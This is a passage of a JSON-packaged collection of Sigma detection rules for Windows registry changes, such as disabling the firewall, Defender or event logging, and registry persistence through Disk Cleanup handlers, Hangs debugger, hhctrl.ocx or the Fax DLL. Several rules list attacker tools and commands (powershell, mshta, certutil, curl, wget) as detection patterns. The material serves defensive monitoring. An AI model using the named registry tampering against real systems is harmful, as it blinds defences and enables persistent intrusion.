    "content": "title: Disable Windows Firewall by Registry\nid: e78c408a-e2ea-43cd-b5ea-51975cf358c0\nstatus: test\ndescription: Detect set EnableFirewall to 0 to disable the Windows firewall\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1562.004/T1562.004.md\nauthor: frack113\ndate: 2022-08-19\nmodified: 2023-08-17\ntags:\n    - attack.defense-evasion\n    - attack.t1562.004\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith:\n            - \\SOFTWARE\\Policies\\Microsoft\\WindowsFirewall\\StandardProfile\\EnableFirewall\n            - \\SOFTWARE\\Policies\\Microsoft\\WindowsFirewall\\DomainProfile\\EnableFirewall\n        Details: DWORD (0x00000000)\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_disable_winevt_logging.yml",
    "content": "title: Disable Windows Event Logging Via Registry\nid: 2f78da12-f7c7-430b-8b19-a28f269b77a3\nstatus: test\ndescription: Detects tampering with the \"Enabled\" registry key in order to disable Windows logging of a Windows event channel\nreferences:\n    - https://twitter.com/WhichbufferArda/status/1543900539280293889\n    - https://github.com/DebugPrivilege/CPP/blob/c39d365617dbfbcb01fffad200d52b6239b2918c/Windows%20Defender/RestoreDefenderConfig.cpp\nauthor: frack113, Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-04\nmodified: 2024-03-25\ntags:\n    - attack.defense-evasion\n    - attack.t1562.002\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\'\n        TargetObject|endswith: '\\Enabled'\n        Details: 'DWORD (0x00000000)'\n    filter_main_wevutil:\n        Image: 'C:\\Windows\\system32\\wevtutil.exe' # FP generated during installation of manifests via wevtutil\n    filter_main_iis:\n        Image|startswith: 'C:\\Windows\\winsxs\\'\n        Image|endswith: '\\TiWorker.exe'  # Many different TargetObjects\n    filter_main_svchost:\n        Image: 'C:\\Windows\\System32\\svchost.exe'\n        TargetObject|contains:\n            - '\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\Microsoft-Windows-FileInfoMinifilter'\n            - '\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\Microsoft-Windows-ASN1\\'\n            - '\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\Microsoft-Windows-Kernel-AppCompat\\'\n            - '\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\Microsoft-Windows-Runtime\\Error\\'\n            - '\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\Microsoft-Windows-CAPI2/Operational\\'\n    filter_main_trusted_installer:\n        Image: C:\\Windows\\servicing\\TrustedInstaller.exe\n        TargetObject|contains: '\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\Microsoft-Windows-Compat-Appraiser'\n    filter_optional_empty: # This filter is related to aurora. Should be removed when fix is deployed. # TODO: Remove later\n        Image: ''\n    filter_optional_null: # This filter is related to aurora. Should be removed when fix is deployed. # TODO: Remove later\n        Image: null\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Rare falsepositives may occur from legitimate administrators disabling specific event log for troubleshooting\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_disabled_exploit_guard_net_protection_on_ms_defender.yml",
    "content": "title: Disable Exploit Guard Network Protection on Windows Defender\nid: bf9e1387-b040-4393-9851-1598f8ecfae9\nstatus: test\ndescription: Detects disabling Windows Defender Exploit Guard Network Protection\nreferences:\n    - https://www.tenforums.com/tutorials/105533-enable-disable-windows-defender-exploit-protection-settings.html\nauthor: Austin Songer @austinsonger\ndate: 2021-08-04\nmodified: 2023-08-17\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: 'SOFTWARE\\Policies\\Microsoft\\Windows Defender Security Center\\App and Browser protection\\DisallowExploitProtectionOverride'\n        Details: 'DWORD (00000001)'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_disabled_microsoft_defender_eventlog.yml",
    "content": "title: Disabled Windows Defender Eventlog\nid: fcddca7c-b9c0-4ddf-98da-e1e2d18b0157\nstatus: test\ndescription: Detects the disabling of the Windows Defender eventlog as seen in relation to Lockbit 3.0 infections\nreferences:\n    - https://twitter.com/WhichbufferArda/status/1543900539280293889/photo/2\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-07-04\nmodified: 2023-08-17\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\Microsoft-Windows-Windows Defender/Operational\\Enabled'\n        Details: 'DWORD (0x00000000)'\n    condition: selection\nfalsepositives:\n    - Other Antivirus software installations could cause Windows to disable that eventlog (unknown)\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_disabled_pua_protection_on_microsoft_defender.yml",
    "content": "title: Disable PUA Protection on Windows Defender\nid: 8ffc5407-52e3-478f-9596-0a7371eafe13\nstatus: test\ndescription: Detects disabling Windows Defender PUA protection\nreferences:\n    - https://www.tenforums.com/tutorials/32236-enable-disable-microsoft-defender-pua-protection-windows-10-a.html\nauthor: Austin Songer @austinsonger\ndate: 2021-08-04\nmodified: 2023-08-17\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\Policies\\Microsoft\\Windows Defender\\PUAProtection'\n        Details: 'DWORD (0x00000000)'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_disabled_tamper_protection_on_microsoft_defender.yml",
    "content": "title: Disable Tamper Protection on Windows Defender\nid: 93d298a1-d28f-47f1-a468-d971e7796679\nstatus: test\ndescription: Detects disabling Windows Defender Tamper Protection\nreferences:\n    - https://www.tenforums.com/tutorials/123792-turn-off-tamper-protection-microsoft-defender-antivirus.html\nauthor: Austin Songer @austinsonger\ndate: 2021-08-04\nmodified: 2023-08-17\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\Microsoft\\Windows Defender\\Features\\TamperProtection'\n        Details: DWORD (0x00000000)\n    filter_msmpeng_client: # only disabled temporarily during updates\n        Image|startswith: 'C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\'\n        Image|endswith: '\\MsMpEng.exe'\n    filter_msmpeng_domain_controller: # only disabled temporarily during updates\n        Image: 'C:\\Program Files\\Windows Defender\\MsMpEng.exe'\n    condition: selection and not 1 of filter_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_disallowrun_execution.yml",
    "content": "title: Add DisallowRun Execution to Registry\nid: 275641a5-a492-45e2-a817-7c81e9d9d3e9\nstatus: test\ndescription: Detect set DisallowRun to 1 to prevent user running specific computer program\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md\nauthor: frack113\ndate: 2022-08-19\nmodified: 2023-08-17\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1112\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith: 'Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\DisallowRun'\n        Details: 'DWORD (0x00000001)'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_disk_cleanup_handler_autorun_persistence.yml",
    "content": "title: Persistence Via Disk Cleanup Handler - Autorun\nid: d4e2745c-f0c6-4bde-a3ab-b553b3f693cc\nstatus: test\ndescription: |\n    Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence via autorun.\n    The disk cleanup manager is part of the operating system.\n    It displays the dialog box […] The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI.\n    Although Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications.\n    Instead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler.\n    Any developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.\nreferences:\n    - https://persistence-info.github.io/Data/diskcleanuphandler.html\n    - https://www.hexacorn.com/blog/2018/09/02/beyond-good-ol-run-key-part-86/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-21\nmodified: 2023-08-17\ntags:\n    - attack.persistence\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    root:\n        TargetObject|contains: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\VolumeCaches\\'\n    selection_autorun:\n        # Launching PreCleanupString / CleanupString programs w/o gui, i.e. while using e.g. /autoclean\n        TargetObject|contains: '\\Autorun'\n        Details: 'DWORD (0x00000001)'\n    selection_pre_after:\n        TargetObject|contains:\n            - '\\CleanupString'\n            - '\\PreCleanupString'\n        Details|contains:\n            # Add more as you see fit\n            - 'cmd'\n            - 'powershell'\n            - 'rundll32'\n            - 'mshta'\n            - 'cscript'\n            - 'wscript'\n            - 'wsl'\n            - '\\Users\\Public\\'\n            - '\\Windows\\TEMP\\'\n            - '\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\'\n    condition: root and 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_dns_over_https_enabled.yml",
    "content": "title: DNS-over-HTTPS Enabled by Registry\nid: 04b45a8a-d11d-49e4-9acc-4a1b524407a5\nstatus: test\ndescription: |\n    Detects when a user enables DNS-over-HTTPS.\n    This can be used to hide internet activity or be used to hide the process of exfiltrating data.\n    With this enabled organization will lose visibility into data such as query type, response and originating IP that are used to determine bad actors.\nreferences:\n    - https://www.tenforums.com/tutorials/151318-how-enable-disable-dns-over-https-doh-microsoft-edge.html\n    - https://github.com/elastic/detection-rules/issues/1371\n    - https://chromeenterprise.google/policies/?policy=DnsOverHttpsMode\n    - https://admx.help/HKLM/Software/Policies/Mozilla/Firefox/DNSOverHTTPS\nauthor: Austin Songer\ndate: 2021-07-22\nmodified: 2023-08-17\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1140\n    - attack.t1112\nlogsource:\n    product: windows\n    category: registry_set\ndetection:\n    selection_edge:\n        TargetObject|endswith: '\\SOFTWARE\\Policies\\Microsoft\\Edge\\BuiltInDnsClientEnabled'\n        Details: DWORD (0x00000001)\n    selection_chrome:\n        TargetObject|endswith: '\\SOFTWARE\\Google\\Chrome\\DnsOverHttpsMode'\n        Details: 'secure'\n    selection_firefox:\n        TargetObject|endswith: '\\SOFTWARE\\Policies\\Mozilla\\Firefox\\DNSOverHTTPS\\Enabled'\n        Details: DWORD (0x00000001)\n    condition: 1 of selection_*\nfalsepositives:\n    - Unlikely\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_dns_server_level_plugin_dll.yml",
    "content": "title: New DNS ServerLevelPluginDll Installed\nid: e61e8a88-59a9-451c-874e-70fcc9740d67\nrelated:\n    - id: cbe51394-cd93-4473-b555-edf0144952d9\n      type: derived\n    - id: f63b56ee-3f79-4b8a-97fb-5c48007e8573\n      type: derived\nstatus: test\ndescription: Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)\nreferences:\n    - https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83\n    - https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-05-08\nmodified: 2023-08-17\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1574.001\n    - attack.t1112\nlogsource:\n    product: windows\n    category: registry_set\ndetection:\n    selection:\n        TargetObject|endswith: '\\services\\DNS\\Parameters\\ServerLevelPluginDll'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_dot_net_etw_tamper.yml",
    "content": "title: ETW Logging Disabled In .NET Processes - Sysmon Registry\nid: bf4fc428-dcc3-4bbd-99fe-2422aeee2544\nrelated:\n    - id: a4c90ea1-2634-4ca0-adbb-35eae169b6fc\n      type: similar\nstatus: test\ndescription: Potential adversaries stopping ETW providers recording loaded .NET assemblies.\nreferences:\n    - https://twitter.com/_xpn_/status/1268712093928378368\n    - https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr\n    - https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables\n    - https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38\n    - https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39\n    - https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_\n    - https://bunnyinside.com/?term=f71e8cb9c76a\n    - http://managed670.rssing.com/chan-5590147/all_p1.html\n    - https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code\n    - https://blog.xpnsec.com/hiding-your-dotnet-complus-etwenabled/\n    - https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)\ndate: 2020-06-05\nmodified: 2023-08-17\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1112\n    - attack.t1562\nlogsource:\n    product: windows\n    category: registry_set\ndetection:\n    selection_etw_enabled:\n        TargetObject|endswith: 'SOFTWARE\\Microsoft\\.NETFramework\\ETWEnabled'\n        Details: 'DWORD (0x00000000)'\n    selection_complus:\n        TargetObject|endswith:\n            - '\\COMPlus_ETWEnabled'\n            - '\\COMPlus_ETWFlags'\n        Details:\n            - 0 # For REG_SZ type\n            - 'DWORD (0x00000000)'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_dsrm_tampering.yml",
    "content": "title: Directory Service Restore Mode(DSRM) Registry Value Tampering\nid: b61e87c0-50db-4b2e-8986-6a2be94b33b0\nrelated:\n    - id: 53ad8e36-f573-46bf-97e4-15ba5bf4bb51\n      type: similar\nstatus: test\ndescription: |\n    Detects changes to \"DsrmAdminLogonBehavior\" registry value.\n    During a Domain Controller (DC) promotion, administrators create a Directory Services Restore Mode (DSRM) local administrator account with a password that rarely changes. The DSRM account is an “Administrator” account that logs in with the DSRM mode when the server is booting up to restore AD backups or recover the server from a failure.\n    Attackers could abuse DSRM account to maintain their persistence and access to the organization's Active Directory.\n    If the \"DsrmAdminLogonBehavior\" value is set to \"0\", the administrator account can only be used if the DC starts in DSRM.\n    If the \"DsrmAdminLogonBehavior\" value is set to \"1\", the administrator account can only be used if the local AD DS service is stopped.\n    If the \"DsrmAdminLogonBehavior\" value is set to \"2\", the administrator account can always be used.\nreferences:\n    - https://adsecurity.org/?p=1785\n    - https://www.sentinelone.com/blog/detecting-dsrm-account-misconfigurations/\n    - https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/dsrm-credentials\nauthor: Nischal Khadgi\ndate: 2024-07-11\ntags:\n    - attack.defense-evasion\n    - attack.credential-access\n    - attack.persistence\n    - attack.t1556\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith: '\\Control\\Lsa\\DsrmAdminLogonBehavior'\n    filter_main_default_value:\n        Details: 'DWORD (0x00000000)' # Default value\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_enable_periodic_backup.yml",
    "content": "title: Periodic Backup For System Registry Hives Enabled\nid: 973ef012-8f1a-4c40-93b4-7e659a5cd17f\nstatus: test\ndescription: |\n    Detects the enabling of the \"EnablePeriodicBackup\" registry value. Once enabled, The OS will backup System registry hives on restarts to the \"C:\\Windows\\System32\\config\\RegBack\" folder. Windows creates a \"RegIdleBackup\" task to manage subsequent backups.\n    Registry backup was a default behavior on Windows and was disabled as of \"Windows 10, version 1803\".\nreferences:\n    - https://learn.microsoft.com/en-us/troubleshoot/windows-client/installing-updates-features-roles/system-registry-no-backed-up-regback-folder\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2024-07-01\ntags:\n    - attack.collection\n    - attack.t1113\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith: '\\Control\\Session Manager\\Configuration Manager\\EnablePeriodicBackup'\n        Details: 'DWORD (0x00000001)'\n    condition: selection\nfalsepositives:\n    - Legitimate need for RegBack feature by administrators.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_enable_windows_recall.yml",
    "content": "title: Windows Recall Feature Enabled - Registry\nid: 75180c5f-4ea1-461a-a4f6-6e4700c065d4\nrelated:\n    - id: 5dfc1465-8f65-4fde-8eb5-6194380c6a62\n      type: similar\n    - id: 817f252c-5143-4dae-b418-48c3e9f63728\n      type: similar\nstatus: test\ndescription: |\n    Detects the enabling of the Windows Recall feature via registry manipulation. Windows Recall can be enabled by setting the value of \"DisableAIDataAnalysis\" to \"0\".\n    Adversaries may enable Windows Recall as part of post-exploitation discovery and collection activities.\n    This rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary.\nreferences:\n    - https://learn.microsoft.com/en-us/windows/client-management/manage-recall\n    - https://learn.microsoft.com/en-us/windows/client-management/mdm/policy-csp-windowsai#disableaidataanalysis\nauthor: Sajid Nawaz Khan\ndate: 2024-06-02\ntags:\n    - attack.collection\n    - attack.t1113\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        # HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\WindowsAI\\DisableAIDataAnalysis\n        # HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsAI\\DisableAIDataAnalysis\n        TargetObject|endswith: '\\Software\\Policies\\Microsoft\\Windows\\WindowsAI\\DisableAIDataAnalysis'\n        Details: 'DWORD (0x00000000)'\n    condition: selection\nfalsepositives:\n    - Legitimate use/activation of Windows Recall\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_enabling_cor_profiler_env_variables.yml",
    "content": "title: Enabling COR Profiler Environment Variables\nid: ad89044a-8f49-4673-9a55-cbd88a1b374f\nstatus: test\ndescription: Detects .NET Framework CLR and .NET Core CLR \"cor_enable_profiling\" and \"cor_profiler\" variables being set and configured.\nreferences:\n    - https://twitter.com/jamieantisocial/status/1304520651248668673\n    - https://www.slideshare.net/JamieWilliams130/started-from-the-bottom-exploiting-data-sources-to-uncover-attck-behaviors\n    - https://www.sans.org/cyber-security-summit/archives\n    - https://learn.microsoft.com/en-us/dotnet/core/runtime-config/debugging-profiling\nauthor: Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research), Jimmy Bayne (@bohops)\ndate: 2020-09-10\nmodified: 2023-11-24\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.t1574.012\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection_1:\n        TargetObject|endswith:\n            - '\\COR_ENABLE_PROFILING'\n            - '\\COR_PROFILER'\n            - '\\CORECLR_ENABLE_PROFILING'\n    selection_2:\n        TargetObject|contains: '\\CORECLR_PROFILER_PATH'\n    condition: 1 of selection_*\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_enabling_turnoffcheck.yml",
    "content": "title: Scripted Diagnostics Turn Off Check Enabled - Registry\nid: 7d995e63-ec83-4aa3-89d5-8a17b5c87c86\nstatus: test\ndescription: Detects enabling TurnOffCheck which can be used to bypass defense of MSDT Follina vulnerability\nreferences:\n    - https://twitter.com/wdormann/status/1537075968568877057?s=20&t=0lr18OAnmAGoGpma6grLUw\nauthor: 'Christopher Peacock @securepeacock, SCYTHE @scythe_io'\ndate: 2022-06-15\nmodified: 2023-08-17\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    product: windows\n    category: registry_set\ndetection:\n    selection:\n        TargetObject|endswith: '\\Policies\\Microsoft\\Windows\\ScriptedDiagnostics\\TurnOffCheck'\n        Details: 'DWORD (0x00000001)'\n    condition: selection\nfalsepositives:\n    - Administrator actions\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_evtx_file_key_tamper.yml",
    "content": "title: Potential EventLog File Location Tampering\nid: 0cb8d736-995d-4ce7-a31e-1e8d452a1459\nstatus: test\ndescription: Detects tampering with EventLog service \"file\" key. In order to change the default location of an Evtx file. This technique is used to tamper with log collection and alerting\nreferences:\n    - https://learn.microsoft.com/en-us/windows/win32/eventlog/eventlog-key\nauthor: D3F7A5105\ndate: 2023-01-02\nmodified: 2023-08-17\ntags:\n    - attack.defense-evasion\n    - attack.t1562.002\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\'\n        TargetObject|endswith: '\\File'\n    filter:\n        Details|contains: '\\System32\\Winevt\\Logs\\'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_exploit_guard_susp_allowed_apps.yml",
    "content": "title: Suspicious Application Allowed Through Exploit Guard\nid: 42205c73-75c8-4a63-9db1-e3782e06fda0\nstatus: test\ndescription: Detects applications being added to the \"allowed applications\" list of exploit guard in order to bypass controlled folder settings\nreferences:\n    - https://www.microsoft.com/security/blog/2017/10/23/windows-defender-exploit-guard-reduce-the-attack-surface-against-next-generation-malware/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-05\nmodified: 2023-08-17\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection_key:\n        TargetObject|contains: 'SOFTWARE\\Microsoft\\Windows Defender\\Windows Defender Exploit Guard\\Controlled Folder Access\\AllowedApplications'\n    selection_paths:\n        TargetObject|contains:\n            # Add more paths you don't allow in your org\n            - '\\Users\\Public\\'\n            - '\\AppData\\Local\\Temp\\'\n            - '\\Desktop\\'\n            - '\\PerfLogs\\'\n            - '\\Windows\\Temp\\'\n    condition: all of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_fax_change_service_user.yml",
    "content": "title: Change User Account Associated with the FAX Service\nid: e3fdf743-f05b-4051-990a-b66919be1743\nstatus: test\ndescription: Detect change of the user account associated with the FAX service to avoid the escalation problem.\nreferences:\n    - https://twitter.com/dottor_morte/status/1544652325570191361\n    - https://raw.githubusercontent.com/RiccardoAncarani/talks/master/F-Secure/unorthodox-lateral-movement.pdf\nauthor: frack113\ndate: 2022-07-17\nmodified: 2022-12-30\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1112\nlogsource:\n    product: windows\n    category: registry_set\ndetection:\n    selection:\n        TargetObject: HKLM\\System\\CurrentControlSet\\Services\\Fax\\ObjectName\n    filter:\n        Details|contains: NetworkService\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_fax_dll_persistance.yml",
    "content": "title: Change the Fax Dll\nid: 9e3357ba-09d4-4fbd-a7c5-ad6386314513\nstatus: test\ndescription: Detect possible persistence using Fax DLL load when service restart\nreferences:\n    - https://twitter.com/dottor_morte/status/1544652325570191361\n    - https://raw.githubusercontent.com/RiccardoAncarani/talks/master/F-Secure/unorthodox-lateral-movement.pdf\nauthor: frack113\ndate: 2022-07-17\nmodified: 2022-12-30\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1112\nlogsource:\n    product: windows\n    category: registry_set\ndetection:\n    selection:\n        TargetObject|contains|all:\n            - '\\Software\\Microsoft\\Fax\\Device Providers\\'\n            - '\\ImageName'\n    filter:\n        Details: '%systemroot%\\system32\\fxst30.dll' # Windows 10\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_file_association_exefile.yml",
    "content": "title: New File Association Using Exefile\nid: 44a22d59-b175-4f13-8c16-cbaef5b581ff\nstatus: test\ndescription: Detects the abuse of the exefile handler in new file association. Used for bypass of security products.\nreferences:\n    - https://twitter.com/mrd0x/status/1461041276514623491\nauthor: Andreas Hunkeler (@Karneades)\ndate: 2021-11-19\nmodified: 2023-08-17\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: 'Classes\\.'\n        Details: 'exefile'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_filefix_typedpath_commands.yml",
    "content": "title: FileFix - Command Evidence in TypedPaths\nid: 4fee3d51-8069-4a4c-a0f7-924fcaff2c70\nrelated:\n    - id: 4be03877-d5b6-4520-85c9-a5911c0a656c\n      type: similar\nstatus: experimental\ndescription: |\n    Detects commonly-used chained commands and strings in the most recent 'url' value of the 'TypedPaths' key, which could be indicative of a user being targeted by the FileFix technique.\nreferences:\n    - https://x.com/russianpanda9xx/status/1940831134759506029\n    - https://mrd0x.com/filefix-clickfix-alternative/\n    - https://www.scpx.com.au/2025/11/16/decades-old-finger-protocol-abused-in-clickfix-malware-attacks/\nauthor: Alfie Champion (delivr.to), Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-07-05\nmodified: 2025-11-19\ntags:\n    - attack.execution\n    - attack.t1204.004\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection_base:\n        TargetObject|endswith: '\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\TypedPaths\\url1'\n        Details|contains|all:\n            - '#'\n            - 'http'\n    selection_cmd:\n        - Details|contains:\n              # Add more suspicious keywords\n              - 'account'\n              - 'anti-bot'\n              - 'botcheck'\n              - 'captcha'\n              - 'challenge'\n              - 'confirmation'\n              - 'fraud'\n              - 'human'\n              - 'identification'\n              - 'identificator'\n              - 'identity'\n              - 'robot'\n              - 'validation'\n              - 'verification'\n              - 'verify'\n        - Details|contains:\n              - '%comspec%'\n              - 'bitsadmin'\n              - 'certutil'\n              - 'cmd'\n              - 'cscript'\n              - 'curl'\n              - 'finger'\n              - 'mshta'\n              - 'powershell'\n              - 'pwsh'\n              - 'regsvr32'\n              - 'rundll32'\n              - 'schtasks'\n              - 'wget'\n              - 'wscript'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_hangs_debugger_persistence.yml",
    "content": "title: Add Debugger Entry To Hangs Key For Persistence\nid: 833ef470-fa01-4631-a79b-6f291c9ac498\nstatus: test\ndescription: Detects when an attacker adds a new \"Debugger\" value to the \"Hangs\" key in order to achieve persistence which will get invoked when an application crashes\nreferences:\n    - https://persistence-info.github.io/Data/wer_debugger.html\n    - https://www.hexacorn.com/blog/2019/09/20/beyond-good-ol-run-key-part-116/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-21\nmodified: 2023-08-17\ntags:\n    - attack.persistence\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\SOFTWARE\\Microsoft\\Windows\\Windows Error Reporting\\Hangs\\Debugger'\n    condition: selection\nfalsepositives:\n    - This value is not set by default but could be rarly used by administrators\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_hhctrl_persistence.yml",
    "content": "title: Persistence Via Hhctrl.ocx\nid: f10ed525-97fe-4fed-be7c-2feecca941b1\nstatus: test\ndescription: Detects when an attacker modifies the registry value of the \"hhctrl\" to point to a custom binary\nreferences:\n    - https://persistence-info.github.io/Data/hhctrl.html\n    - https://www.hexacorn.com/blog/2018/04/23/beyond-good-ol-run-key-part-77/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-21\nmodified: 2023-08-17\ntags:\n    - attack.persistence\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\CLSID\\{52A2AAAE-085D-4187-97EA-8C30DB990436}\\InprocServer32\\(Default)'\n    filter:\n        Details: 'C:\\Windows\\System32\\hhctrl.ocx'\n    condition: selection and not filter\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_hidden_extention.yml",
